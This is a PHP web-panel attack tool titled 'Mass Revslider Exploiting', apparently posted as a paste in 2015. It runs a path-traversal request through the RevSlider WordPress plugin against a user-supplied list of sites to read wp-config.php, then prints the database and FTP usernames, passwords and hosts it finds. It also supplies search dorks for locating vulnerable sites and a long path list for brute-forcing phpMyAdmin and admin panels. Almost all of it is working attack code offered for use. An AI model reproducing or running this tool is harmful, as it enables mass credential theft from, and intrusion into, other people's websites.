
Mass Revslider Exploiting V - 1

Jul 27th, 2015
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  1. <?
  2. echo"
  3. <body bgcolor='#000000' text='white'>
  4. <title>Mass Revslider Exl0it1ng</title>
  5. <style>
  6. body,table{background: black; }
  7. A:link {text-decoration: none;color: red;}
  8. A:active {text-decoration: none;color: red;}
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  21. }
  22. </style>
  23. <center><img src='' height='150' width='150'></img><br>
  24. <!--- Menu -----!--->
  25. <p align='center' dir='ltr'>
  26. <font face='Verdana' size='2' color='#FFFFFF'>#
  27. <a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~
  28. <a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
  29. <font face='Verdana' size='2' color='#006699'>
  30. <a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
  31. <font face='Verdana' size='2' color='#006699'>
  32. <a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>
  36. <font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
  37. <font face='Verdana' size='2' color='#006699'>
  38. <a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>
  42. <font face='Verdana' size='2' color='#FFFFFF'> # </font>
  43. <br><br>
  44. ";
  47. /////////////////////////////////
  48. if ($_GET['dz'] == 'exp') {
  49. echo"<form method='post'>
  50. <textarea name='sites' cols='50' rows='12'></textarea><br>
  51. <input type='submit' name='go' value='Exploit'>
  52. </form>";
  53. function findit($mytext,$starttag,$endtag) {
  54. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
  55. $posRight = stripos($mytext,$endtag,$posLeft+1);
  56. return substr($mytext,$posLeft,$posRight-$posLeft);
  57. }
  58. error_reporting(0);
  59. set_time_limit(0);
  60. $ya=$_POST['go'];
  61. $co=$_POST['sites'];
  63. if($ya){
  64. $e=explode("\r\n",$co);
  65. foreach($e as $bda){
  66. //echo '<br>'.$bda;
  67. /// you can devlope the tool ///
  68. $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  69. $dn=($bda).($linkof);
  70. $file=@file_get_contents($dn);
  71. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  72. echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
  73. echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
  74. echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  75. echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  76. echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  77. echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  78. }
  79. elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  80. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
  81. echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
  82. echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
  83. echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  84. echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  85. echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  86. }
  87. else{
  88. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
  89. echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
  90. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
  91. }
  93. }
  94. }
  95. /////////////////////////////////////
  97. /////////////////////////////////////
  98. if ($_GET['dz'] == 'dorks') {
  99. echo'<br><textarea cols=50 rows=12 >
  100. inurl:wp-content/plugins/revslider/
  101. inurl:revslider
  102. inurl:revslider_admin.php
  103. inurl:revslider_front.php
  104. inurl:plugins/revslider/
  105. intext:Powered by Revslider
  106. intitle:"Index Of/ revslider"
  107. intitle:"Index Of/wp-content/themes/revslider"
  108. intitle:"Index Of/wp-content/plugins/revslider"
  109. intitle:"Index Of/admin/revslider"
  110. intitle:"Index Of/fr/revslider"
  111. intitle:"Index Of/en/revslider"
  112. intitle:"Index Of/us/revslider"
  113. intitle:"Index Of/ar/revslider"
  114. intitle:"Index Of/es/revslider"
  115. intitle:"Index Of/de/revslider"
  116. </textarea>';
  118. }
  119. //////////////////////////////////////
  121. //////////////////////////////////////
  122. if ($_GET['dz'] == 'toip') {
  123. echo"
  124. <form method='post' ><center>
  125. <textarea cols='50' rows='12' name='site2ip' >
  126. Please Romove http:// or https://</textarea></br><br>
  127. <input type='submit' name='w2ip' value='Extract' ><br>
  128. </center>";
  129. if(isset($_POST['site2ip'])){
  130. foreach(explode("\n",$_POST['site2ip']) as $site4ip){
  131. $ipp=trim($site4ip);
  132. echo '<font color="red" size="3"></font><font color="green" size="5"><center>
  133. <font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
  134. <font color=white face=Verdana size=-2> ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>';
  135. }
  136. }
  137. }
  138. ////////////////////////////////////
  140. ////////////////////////////////////
  141. if ($_GET['dz'] == 'db') {
  144. echo'
  145. <form action ="" method="post">
  146. <font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
  147. <input type = "submit" value="Find" />
  148. </form>';
  149. $site = $_POST['site'];
  150. $list = array(
  151. '/phpMyAdmin/',
  152. '/phpmyadmin/',
  153. '/PMA/',
  154. '/pma/',
  155. '/admin/',
  156. '/dbadmin/',
  157. '/DB_ADMIN/',
  158. '/db_admin/',
  159. '/DBA/',
  160. '/SQLI/',
  161. '/dba/',
  162. '/sqli/',
  163. '/mysql/',
  164. '/myadmin/',
  165. '/phpmyadmin2/',
  166. '/phpMyAdmin2/',
  167. '/phpMyAdmin-2/',
  168. '/php-my-admin/',
  169. '/phpMyAdmin-2.2.3/',
  170. '/phpMyAdmin-2.2.6/',
  171. '/phpMyAdmin-2.5.1/',
  172. '/phpMyAdmin-2.5.4/',
  173. '/phpMyAdmin-2.5.5-rc1/',
  174. '/phpMyAdmin-2.5.5-rc2/',
  175. '/phpMyAdmin-2.5.5/',
  176. '/phpMyAdmin-2.5.5-pl1/',
  177. '/phpMyAdmin-2.5.6-rc1/',
  178. '/phpMyAdmin-2.5.6-rc2/',
  179. '/phpMyAdmin-2.5.6/',
  180. '/phpMyAdmin-2.5.7/',
  181. '/phpMyAdmin-2.5.7-pl1/',
  182. '/phpMyAdmin-2.6.0-alpha/',
  183. '/phpMyAdmin-2.6.0-alpha2/',
  184. '/phpMyAdmin-2.6.0-beta1/',
  185. '/phpMyAdmin-2.6.0-beta2/',
  186. '/phpMyAdmin-2.6.0-rc1/',
  187. '/phpMyAdmin-2.6.0-rc2/',
  188. '/phpMyAdmin-2.6.0-rc3/',
  189. '/phpMyAdmin-2.6.0/',
  190. '/phpMyAdmin-2.6.0-pl1/',
  191. '/phpMyAdmin-2.6.0-pl2/',
  192. '/phpMyAdmin-2.6.0-pl3/',
  193. '/phpMyAdmin-2.6.1-rc1/',
  194. '/phpMyAdmin-2.6.1-rc2/',
  195. '/phpMyAdmin-2.6.1/',
  196. '/phpMyAdmin-2.6.1-pl1/',
  197. '/phpMyAdmin-2.6.1-pl2/',
  198. '/phpMyAdmin-2.6.1-pl3/',
  199. '/phpMyAdmin-2.6.2-rc1/',
  200. '/phpMyAdmin-2.6.2-beta1/',
  201. '/phpMyAdmin-2.6.2-rc1/',
  202. '/phpMyAdmin-2.6.2/',
  203. '/phpMyAdmin-2.6.2-pl1/',
  204. '/phpMyAdmin-2.6.3/',
  205. '/phpMyAdmin-2.6.3-rc1/',
  206. '/phpMyAdmin-2.6.3/',
  207. '/phpMyAdmin-2.6.3-pl1/',
  208. '/phpMyAdmin-2.6.4-rc1/',
  209. '/phpMyAdmin-2.6.4-pl1/',
  210. '/phpMyAdmin-2.6.4-pl2/',
  211. '/phpMyAdmin-2.6.4-pl3/',
  212. '/phpMyAdmin-2.6.4-pl4/',
  213. '/phpMyAdmin-2.6.4/',
  214. '/phpMyAdmin-2.7.0-beta1/',
  215. '/phpMyAdmin-2.7.0-rc1/',
  216. '/phpMyAdmin-2.7.0-pl1/',
  217. '/phpMyAdmin-2.7.0-pl2/',
  218. '/phpMyAdmin-2.7.0/',
  219. '/phpMyAdmin-2.8.0-beta1/',
  220. '/phpMyAdmin-2.8.0-rc1/',
  221. '/phpMyAdmin-2.8.0-rc2/',
  222. '/phpMyAdmin-2.8.0/',
  223. '/phpMyAdmin-',
  224. '/phpMyAdmin-',
  225. '/phpMyAdmin-',
  226. '/phpMyAdmin-',
  227. '/phpMyAdmin-2.8.1-rc1/',
  228. '/phpMyAdmin-2.8.1/',
  229. '/phpMyAdmin-2.8.2/',
  230. '/sqlmanager/',
  231. '/mysqlmanager/',
  232. '/p/m/a/',
  233. '/PMA2005/',
  234. '/pma2005/',
  235. '/dev/',
  236. '/phpmanager/',
  237. '/php-myadmin/',
  238. '/phpmy-admin/',
  239. '/webadmin/',
  240. '/sqlweb/',
  241. '/websql/',
  242. '/webdb/',
  243. '/mysqladmin/',
  244. '/mysql-admin/',
  245. '/mya/',
  246. '/PhpMyAdmin/',
  247. '/phpmyadmin/',
  248. '/myadmin/',
  249. '/mysql/',
  250. '/sql/',
  251. '/server/',
  252. '/db/',
  253. '/database/',
  254. '/databases/',
  255. '/adm/',
  256. '/configuration/',
  257. '/configure/',
  258. '/administrator/',
  259. '/login/',
  260. '/moderator/',
  261. '/controlpanel/',
  262. '/adminpanel/',
  263. '/admincontrol/',
  264. '/fileadmin/',
  265. '/data/',
  266. '/postgresql/',
  267. '/oracle/',
  268. '/msssql/',
  269. '/msaccess/',
  270. '/sysadmin/',
  271. '/serverdata/',
  272. '/webadmin/',
  273. '/admins/',
  274. '/Database_Administration/',
  275. '/WebAdmin/',
  276. '/useradmin/',
  277. '/sysadmins/',
  278. '/admin1/',
  279. '/system-administration/',
  280. '/administrators/',
  281. '/pgadmin/',
  282. '/directadmin/',
  283. '/staradmin/',
  284. '/ServerAdministrator/',
  285. '/SysAdmin/',
  286. '/administer/',
  287. '/LiveUser_Admin/',
  288. '/sys-admin/',
  289. '/typo3/',
  290. '/panel/',
  291. '/xlogin/',
  292. '/smblogin/',
  293. '/phpldapadmin/',
  294. '/server_admin/',
  295. '/database_administration/',
  296. '/system_administration/',
  297. '/ss_vms_admin_sm/',
  298. '/adminarea/',
  299. '/MySQL/',
  300. '/mysql_admin/',
  301. '/server_data/',
  302. '/DB/',
  303. '/DB1/',
  304. '/DB2/',
  305. '/DB3/',
  306. '/DB4/',
  307. '/DB5/',
  308. '/DB6/',
  309. '/DB7/',
  310. '/DB8/',
  311. '/DB9/',
  312. '/DB0/',
  313. '/db1/',
  314. '/db2/',
  315. '/db3/',
  316. '/db4/',
  317. '/db5/',
  318. '/db6/',
  319. '/db7/',
  320. '/db8/',
  321. '/db9/',
  322. '/db0/',
  323. '/mysql5/',
  324. '/mysql4/',
  325. '/root/',
  326. '/apache/',
  327. '/php/',
  328. '/Apache/',
  329. '/Php/',
  330. '/apach/',
  331. '/apachepanel/',
  332. '/WEBSERVERS/',
  333. '/DATABASE1/',
  334. '/DATABASE2/',
  335. '/DATABASE3/',
  336. '/DATABASE4/',
  337. '/DATABASE5/',
  338. '/DATABASE6/',
  339. '/DATABASE7/',
  340. '/DATABASE8/',
  341. '/DATABASE9/',
  342. '/WEBDATA/',
  343. '/WEB_DATA/',
  344. '/webservers/',
  345. '/database1/',
  346. '/database2/',
  347. '/database3/',
  348. '/database4/',
  349. '/database5/',
  350. '/database6/',
  351. '/database7/',
  352. '/database8/',
  353. '/database9/',
  354. '/webdata/',
  355. '/web_data/',
  356. );
  358. if(isset($site)){
  360. foreach($list as $path => $test) {
  361. $ch = curl_init();
  362. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  363. curl_setopt($ch, CURLOPT_HEADER, 1);
  364. curl_setopt($ch, CURLOPT_URL, $site.$test);
  365. $result = curl_exec($ch);
  366. curl_close($ch);
  367. //print $url;
  368. if (preg_match("/200 OK/", $result)){
  369. echo "<br /><b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
  370. }
  371. else if (preg_match("/401 Unauthorized/", $result)) {
  372. echo "<br /><b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
  373. echo "<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
  374. }
  375. }
  376. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
  377. }
  380. }
  381. ////////////////////////////////////
  387. if ($_GET['dz'] == 'scan') {
  389. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href= > </a> ....</font></u></b>";
  390. }
  395. ?>
  399. <center>
  400. <code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
  401. <font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
  402. </center>
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